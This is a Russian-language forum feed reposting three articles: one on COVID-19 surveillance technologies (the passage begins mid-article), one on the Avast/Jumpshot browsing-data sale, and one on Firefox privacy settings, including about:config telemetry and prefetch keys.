COVID-19 в 116 странах мира. В зависимости от преследуемых целей программы использовались для предоставления официальной информацию о заболеваемости в регионе, для самодиагностики или для отслеживания контактов с зараженными с помощью технологии Bluetooth или GPS-трекера, для отслеживания соблюдения обязательного карантина больными COVID-19, для выдачи цифровых пропусков и QR-кодов на перемещение или для выявления правоохранительными органами наличия цифровых пропусков и иных разрешений на время обязательного карантина.</p> <p>Технологии видеонаблюдения, в том числе с функцией распознавания лиц использовались правительствами разных стран для наблюдения за соблюдением режима самоизоляции и поимки нарушителей обязательного карантина. На сегодняшний день только власти Бельгии запретили на законодательном уровне использовать технологии распознавания лиц. Работа технологий распознавания лиц была протестирована в Арабских Эмиратах, Великобритании и Франции, а в Китае алгоритмы распознавания лиц способны распознавать людей даже в масках и определять наличие у них высокой температуры. Кроме того, в Китае сотрудники правоохранительных органов получили «умные шлемы» для автоматического измерения температуры тела окружающих людей и сканирования QR-кодов.</p> <p>Для наблюдения за соблюдением гражданами ограничений на передвижение ряд стран обратился к помощи дронов. Дроны «патрулировали» улицы и следили за тем, чтобы люди не собирались большими компаниями. Подобные технологии были замечены в Австралии, Бельгии, Германии, Греции, Италии, Испании, Китае, Казахстана, ОАЭ и США.</p> <p>Власти Москвы, в свою очередь, во время пандемии активно внедряли технологии распознавания лиц в систему городского видеонаблюдения. Почти 1,5 млрд рублей было потрачено на оснащение общественного транспорта камерами с распознаванием лиц.</p> <p>Для отслеживания распространения коронавируса и мониторинга за соблюдением карантина правительства разных стран используют геоданные пользователей интернета и абонентов сотовой связи, полученные от мобильных операторов. В Европе как минимум 8 операторов сотовой связи согласились предоставлять Еврокомиссии данные о передвижениях граждан для прогнозирования распространения заболеваемости COVID-19.</p> <p>Например, масштабная слежка за гражданами через данные сотовых операторов была запущена в Казахстане, а ее инициатором стала крупнейшая местная телекоммуникационная компания. Управление цифровизации Акимата г. Алматы заключило соглашение о сотрудничестве с местными сотовыми операторами, в рамках которого был составлен геолокационный анализ для отображения активности абонентов мобильных операторов и выявляет места скопления абонентов на ежечасной основе. Сотовые операторы также передавали властям и данные о звонках каждого абонента.</p> <p>Сбор данных о местоположении пользователей также был обнаружен в Австралии, Испании, Чехии, Великобритании, Бразилии, Эквадоре, Словакии, Швейцарии, Китае и Иране, где правительство объяснило это защитой населения и предотвращением риска развития и распространения COVID-19.</p> <p>В России Минкомсвязь еще в марте требовала от региональных властей предоставлять обезличенные списки номеров мобильных телефонов людей, инфицированных коронавирусом, а также тех, кто находится на обязательном карантине по возвращению из-за границы.</p> <p>Эксперты полагают, что количество инструментов слежки в 2021 году будет только увеличиваться, и вряд ли ограничения прав и свобод граждан с применением цифровых технологий и возможностей операторов связи будут сняты в ближайшее время.</p> mybb@mybb.ru (ФБР) Thu, 18 Mar 2021 17:56:42 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=61#p61 https://hacknet.6bb.ru/viewtopic.php?pid=60#p60 <p>Тайный рынок Avast. Как антивирусы продают вашу историю браузера<br />Тайный рынок Avast. Как антивирусы продают вашу историю браузера, изображение №1<br />Дочерняя компания разработчика антивируса Avast продавала каждый поисковой запрос. Каждое нажатие. Каждую покупку. С каждого сайта. Среди его клиентов были, Google, Microsoft, Pepsi и другие.</p> <p>Данный эпизод произошел год назад. После расследования, компания Avast заявила, что остановит сбор данных для компании Jumpshot и прекратит все операции с ней в неотложном порядке. Мы перевели эту захватывающую историю целиком и предлагаем вам прочитать и сделать выводы.<br />Как показало совместное расследование Motherboard и PCMag, антивирус Avast, который используется миллионами людей по всему миру, продает конфиденциальные данные своих пользователей крупным компаниям. Утечка внутренних документов доказывает торговлю строго конфиденциальными данными, включая историю браузеров пользователей.</p> <p>Документы от дочерней компании Avast, под названием Jumpshot, проливают свет на секретную торговлю и цепочки поставок историй браузеров пользователей. Они показывают, что после установки Avast на свой компьютер, он начинает сбор данных и передает их компании Jumpshot, после чего они продаются многим мировым компаниям таким, как Google, Yelp, Microsoft, McKinsey, Pepsi, Home Depot, Cond&#233; Nast, Intuit и другим. Некоторые из этих компаний платят миллионы долларов, чтобы получать данные о каждом вашем нажатии, что позволяет им анализировать ваше поведение в сети.</p> <p>Пользовательская база Avast составляет около 435 миллионов пользователей и 100 миллионов устройств. Все они подписали пользовательское соглашение предусматривающее сбор данных, но некоторые из пользователей сообщили Motherboard и PCMag, что не знали какие именно данные собираются или, что они вообще собираются. Возникает вопрос, насколько хорошо были информированы пользователи?</p> <p>О каких именно данных идет речь? О поисковых запросах в Google, переходах между веб сайтами, GPS координатах с Google Maps, посещений LinkedIn, YouTube и порно сайтов. Хоть эти данные не содержат никаких имен, но на их основе можно с легкостью идентифицировать пользователей.</p> <p>В июле компания Jumpshot утверждала, что раскрывает данные, чтобы маркетологи имели более глубокое представление о рынке в Интернете. Jumpshot ранее публично упоминала некоторых из своих клиентов, как Expedia, IBM, Intuit, TurboTax, Loreal и Home Depot. Сотрудникам рекомендовали не говорить публично об отношениях Jumpshot с этими компаниями.</p> <p>До недавнего времени Avast обирал данные с помощью расширения браузера, которое было создано для того, чтобы ограничивать доступ к вредоносным веб сайтам. Исследователь по кибербезопасности и создатель AdBlock Plus Владимир Палант опубликовал об этом пост в своем блоге. А немного позже Mozilla, Opera и Google Chrome удалили это расширение из своих браузеров. Ранее Avast уже объяснял этот сбор данных и обмен ими в блоге и на форуме в 2015 году. С тех пор Avast пообещал прекратить отправлять данные просмотра, собранные этими расширениями, в Jumpshot, говорится в заявлении Avast для Motherboard и PCMag.</p> <p>Однако, сбор данных все же продолжился. Если раньше Avast делал это через расширение браузера, то теперь он стал это делать это через свой антивирус</p> <p>Тайный рынок Avast. Как антивирусы продают вашу историю браузера, изображение №2<br />Издания Motherboard и PCMag связались с более чем двумя десятками компаний, упомянутых во внутренних документах. Лишь немногие ответили на вопросы о том, что они делают с данными, основанными на истории поиска пользователей Avast.</p> <p>&quot;Иногда мы используем информацию от сторонних поставщиков, чтобы улучшить наш бизнес, продукты и услуги. Мы требуем, чтобы эти поставщики имели соответствующие права на передачу нам этой информации. В этом случае мы получаем анонимные данные о пользователях, которые нельзя использовать для идентификации отдельных клиентов&quot;, - написал представитель Home Depot в заявлении по электронной почте.<br />Microsoft отказалась комментировать особенности того, почему она приобретала данные у Jumpshot, но заявила, что сейчас она не имеет отношений с этой компанией. Southwest Airlines заявила, что обсуждала возможность работы с Jumpshot, но компании не достигли соглашения. IBM заявила, что не была клиентом, а Altria заявила, что тоже не работает с Jumpshot, хотя не уточнила, работала ли ранее. Sephora заявила, что не работает с Jumpshot. Компания Google так и не ответила на запрос.</p> <p>На своем веб-сайте и в пресс-релизах Jumpshot называет клиентами Pepsi и консалтинговых гигантов Bain &amp; Company и McKinsey. Там также перечислены некоторые примеры использования данных об истории просмотра веб страниц. Издательство и цифровой медиа-гигант Cond&#233; Nast, например, использовал продукты Jumpshot, чтобы увидеть, приводит ли реклама компании к увеличению продаж на Amazon и в других местах.</p> <p>All Click Feed<br />Это не все, был еще один продукт Jumpshot под названием All Click Feed. Он позволяет покупать информацию обо всех кликах, которые Jumpshot регистрировал в определенном домене, например Amazon.com, Walmart.com, Target.com, BestBuy.com или Ebay.com.</p> <p>Данные Jumpshot могут показать, как кто-то с установленным на компьютере антивирусом Avast искал продукт в Google, переходил по ссылке, ведущей на Amazon, затем, возможно, добавлял товар корзину на каком-то другом веб-сайте, прежде чем совершить покупку.</p> <p>Согласно копии контракта с Jumpshot, одной из компаний, купивших All Clicks Feed, является маркетинговая фирма Omnicom Media Group из Нью-Йорка. Jumpshot предоставил Omnicom доступ ко всем кликам пользователей из 14 разных стран мира, включая США, Англию, Канаду, Австралию и Новую Зеландию. Данные также включали в себя предполагаемый пол пользователей, их предполагаемый возраст и «полную строку URL-адреса», но с удаленной личной информацией, заявляется в контракте.</p> <p>Согласно контракту с Omnicom, «идентификатор устройства» каждого пользователя хешируется, а это означает, что компания, покупающая данные, не должна иметь возможность идентифицировать, кто именно стоит за каждым просмотром. Вместо этого продукты Jumpshot должны помогать компаниям узнавать, какие продукты особенно популярны или насколько эффективна их рекламная кампания.</p> <p>Но данные Jumpshot могут быть не полностью анонимными. Во внутреннем справочнике по продукту говорится, что идентификаторы устройств не меняются для каждого пользователя, если он полностью не удалит и не переустановит программное обеспечение безопасности. Многочисленные статьи и академические исследования показали, как можно узнать личность человека, используя якобы анонимные данные. Это подтвердили репортеры New York Times в 2006 году, а также исследователи из Стэндфордского университета в 2017 году.</p> <p>Деанонимизация становится куда более серьезной проблемой, если вспомнить о том, что конечные покупатели данных Jumpshot могут объединить их со своими собственными данными.</p> <p>&quot;Большинство угроз, создаваемых деанонимизацией, исходит из способности объединять информацию с другими данными&quot;.<br />Временная метка с точностью до миллисекунды может позволить компании, имеющей собственный банк данных о клиентах, видеть, как один пользователь посещает их собственный сайт, а затем следить за ними через другие сайты с помощью Jumpshot.</p> <p>&quot;Обезличить данные практически невозможно, - сказал Эрик Голдман, профессор юридического факультета Университета Санта-Клары.<br />Журналисты из Motherboard и PCMag задали Avast ряд подробных вопросов о том, как она защищает анонимность пользователей, а также детали некоторых контрактов компании. Avast не ответил на большинство вопросов, но написал в заявлении: &quot;Благодаря нашему подходу мы гарантируем, что Jumpshot не получит никакой идентификационной информации, включая имя, адреса электронной почты или контактные данные, от людей, использующих наше популярное бесплатное антивирусное программное обеспечение&quot;.</p> <p>&quot;У нас большой опыт защиты устройств и данных пользователей от вредоносных программ, и мы понимаем и серьезно относимся к ответственности за балансирование конфиденциальности пользователей с необходимым использованием данных », - говорится в заявлении.<br />Также компания заявила, что соблюдает Калифорнийский закон о конфиденциальности потребителей (CCPA) и Европейский регламент по защите данных (GDPR) касательно всей своей пользовательской базы.</p> <p>Когда редактор PCMag впервые установил антивирусный продукт Avast, программа действительно спросила, хотят ли они принять участие в сборе данных.</p> <p>&quot;Если Вы дадите разрешение, мы предоставим нашей дочерней компании Jumpshot Inc. сбор обезличенных данных, полученных из Вашей истории просмотров, с целью позволить Jumpshot анализировать рынки и бизнес-тенденции и собирать другую ценную информацию&quot;, однако во всплывающем окне не было рассказано ничего о том, как именно Jumpshot затем использует эти данные.</p> mybb@mybb.ru (ФБР) Thu, 18 Mar 2021 17:55:26 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=60#p60 https://hacknet.6bb.ru/viewtopic.php?pid=59#p59 <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox</p> <p>Устали от повсеместного отслеживания в Интернете? Браузер Firefox имеет множество параметров приватности, которые можно настроить в соответствии со своими потребностями.</p> <p>Хотя Google Chrome остается одним из самых популярных браузеров, это вовсе не означает, что он самый безопасный и имеет больше полезных функций, чем другие программы для выхода в Интернет.</p> <p>В отличие от Chrome, Firefox сочетает в себе быструю скорость загрузки страниц, безопасность просмотра веб-контента и стабильность в работе. Это один из самых многофункциональных браузеров в мире, поэтому он так популярен. Firefox дает вам возможность легко изменять свои настройки конфиденциальности либо с помощью встроенных параметров, либо используя сторонние расширения.</p> <p>В этой статье мы узнаем, как сделать Firefox по-настоящему конфиденциальным браузером, используя только настройки самой программы.</p> <p>Почему именно Firefox?<br />Привлекательность Firefox заключается в его открытом исходном коде. Процесс разработки браузера является полностью прозрачным. В нем одновременно участвуют тысячи разработчиков, используя различные платформы. Такой интерес и популярность помогают браузеру получать регулярные обновления и совершенствовать свою работу.</p> <p>Несколько важных фактов о Firefox:</p> <p>Браузер принадлежит некоммерческой компании Mozilla.<br />Он содержит огромное количество возможных расширений, использующихся для улучшения работы Firefox.<br />Firefox имеет открытый исходный код.<br />Компания Mozilla не сотрудничает с корпорациями, которые занимаются продажей данных пользователей.<br />Firefox имеет встроенные параметры безопасности и приватности. С помощью них человек может просматривать веб-страницы, оставаясь инкогнито. Кроме этого, есть несколько быстрых настроек конфиденциальности, которые можно изменить за пару кликов.</p> <p>Стоит отметить, что хотя Mozilla не продает данные своих пользователей, основным источником финансирования компании является корпорация Google. Согласно соглашению между компаниями, Google останется поисковой системой по умолчанию для Firefox, за что Mozilla получает 400-450 млн долларов каждый год.</p> <p>Повысьте конфиденциальность Firefox, изменив настройки<br />В жизни часто приходится идти на компромисс. Если вы готовы отказаться от некоторой степени удобства ради своей конфиденциальности и безопасности, вам придется отключить определенные функции программы.</p> <p>Чтобы повысить конфиденциальность Firefox, мы сначала должны получить доступ к меню настроек, нажав на три горизонтальные линии в правом верхнем углу браузера.</p> <p>В меню «Начало» снимите флажок у пункта «Страницы, сохранённые в Pocket». Это отключит сохранение веб-контента на всех ваших устройствах, подключенных к учетной записи Firefox.</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №2<br />В меню «Приватность и защита» вы увидите три уровня защиты: стандартная, строгая и персональная. Выберите вариант «строгой» защиты, чтобы запретить сторонним веб-сайтам отслеживать ваши действия.</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №3<br />Если «строгий» уровень защиты блокирует доступ к сайту, который вы хотите посетить, просто нажмите на значок щита рядом с адресом сайта и отключите усиленную защиту отслеживания.</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №4<br />Находясь в меню «Приватность и защита», прокрутите страницу вниз до раздела «История». В раскрывающемся меню выберите параметр «Будет использовать ваши настройки хранения истории».</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №5<br />Затем установите флажок у параметра «Всегда работать в режиме приватного просмотра». После этого потребуется перезагрузка браузера. С этого момента Firefox больше не будет сохранять историю посещенных вами страниц и загрузок, а также данные для автозаполнения строк. Таким образом, вы сможете удалить всю личную информацию, которая могла бы быть отслежена и проанализирована другими компаниями, такими как Amazon, Facebook, Google.</p> <p>Стоит также удалить историю посещенных страниц за все время (если вы еще этого не сделали).</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №6<br />Прокрутите страницу дальше вниз до раздела «Разрешения». Настройте каждый элемент, установив флажок у пункта «Блокировать новые запросы» и нажав на кнопку «Сохранить изменения».</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №7<br />Далее следует раздел «Сбор и использование данных Firefox»: снимите здесь все галочки, чтобы убедиться, что взаимодействие между вашим браузером и компанией Mozilla остается минимальным. Это запретит браузеру отправлять любые телеметрические данные в Mozilla.</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №8<br />Теперь самое интересное. В разделе «Защита» есть пункт «Блокировать опасное и обманывающее содержимое». Не поддавайтесь соблазну оставить флажок рядом с этим параметром, ведь именно Google решает, какой именно контент следует заблокировать. Лучше отключить данную функцию.</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №9<br />Переходим в меню «Поиск». Для своего удобства лучше добавить панель поиска на панель инструментов и отделить ее от адресной строки.</p> <p>Следует сделать DuckDuckGo поисковой системой по умолчанию вместо Google и снять флажок у параметра «Отображать поисковые предложения». Это еще больше сократит количество данных, известных о вас браузеру.</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №10<br />Помимо DuckDuckGo, вы также можете использовать конфиденциальную поисковую систему SearX.</p> <p>Наконец-то переходим в меню «Синхронизация». Стоит отключить синхронизацию данных между устройствами и удалить свой личный аккаунт Firefox (предварительно скопировав всю нужную информацию). Это значительно повысит ваш уровень конфиденциальности.</p> <p>Использование команды «about:config» в Firefox<br />Мы повысили конфиденциальность Firefox с помощью параметров, которые видны в его настройках. Однако «под капотом» у Firefox есть и более продвинутые параметры безопасности и конфиденциальности. Скопируйте и вставьте (или просто введите) «about:config» в адресную строку, чтобы получить к ним доступ.</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №11<br />Снимите флажок у пункта «Предупреждать меня, когда я попытаюсь получить доступ к этим настройкам» и нажмите на кнопку «Принять риск и продолжить». Сперва нас интересуют параметры, связанные с телеметрией, поэтому введите «telemetry» в строку поиска. Дважды щелкните на параметрах, указанных ниже, и измените их значения на «false»:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 35em"><pre> browser.newtabpage.activity-stream.feeds.telemetry browser.newtabpage.activity-stream.telemetry browser.ping-centre.telemetry toolkit.telemetry.archive.enabled toolkit.telemetry.bhrPing.enabled toolkit.telemetry.enabled toolkit.telemetry.firstShutdownPing.enabled toolkit.telemetry.hybridContent.enabled toolkit.telemetry.newProfilePing.enabled toolkit.telemetry.reportingpolicy.firstRun toolkit.telemetry.shutdownPingSender.enabled toolkit.telemetry.unified toolkit.telemetry.updatePing.enabled Теперь нажмите на «toolkit.telemetry.server» и удалите его содержимое. Это навсегда запретит передачу любых телеметрических данных между вашим браузером и Mozilla. Теперь введите в поиске «experiments». Эти параметры связаны с исследованием работы и тестированием функций Mozilla. С помощью них браузер также собирает данные о ваших действиях. Соответственно, дважды щелкните на параметрах, указанных ниже, чтобы изменить их значение на «false»: experiments.activeExperiment experiments.enabled experiments.supported network.allow-experiments Вам нужно также отключить сетевой префетчинг, введя «prefetch» в строку поиска. Это важный момент, потому что префетчинг отвечает за предварительную загрузку файлов cookie с сайтов. Это может ускорить загрузку веб-страниц, но и привлечет нежелательное внимание трекеров. Значения параметров должны быть следующими: network.dns.disablePrefetch = true network.dns.disablePrefetchFromHTTPS = true network.predictor.enabled = false network.predictor.enable-prefetch = false network.prefetch-next = false </pre></div></div></div><p>Импорт уже защищенного профиля Firefox<br />Есть и другие способы повышения конфиденциальности, если вы хотите обеспечить себе максимальную безопасность в Интернете. Однако было бы более практично изменить все эти настройки сразу, а не каждую по отдельности. Один из способов сделать это – сменить свой профиль Firefox на тот, который уже максимально защищен.</p> <p>Скачайте, распакуйте и переместите нужные файлы в папку вашего профиля Firefox. В зависимости от операционной системы следует перемещать их в определенное место:</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №12<br />После того как вы распаковали загруженный профиль, нужно установить профиль по умолчанию для своего браузера Firefox. Для этого введите в адресной строке «about:profiles» и выберите пункт «Создать новый профиль».</p> <p>Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №13<br />Браузер предложит вам выбрать папку, где хранится ваш новый профиль Firefox. Он будет иметь название «user. js-master».</p> <p>Теперь вы можете сделать его своим профилем по умолчанию и использовать максимальные меры безопасности, не изменяя вручную десятки настроек.</p> <p>Приватность vs Комфорт<br />Перечисленные выше методы для приватного просмотра страниц могут значительно снизить комфорт использования браузера. Поэтому рекомендуем вам выбрать только те настройки, которые не принесут ущерб вашей производительности. Позаботьтесь не только о приватности своих данных, но и о себе.</p> mybb@mybb.ru (ФБР) Thu, 18 Mar 2021 17:54:11 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=59#p59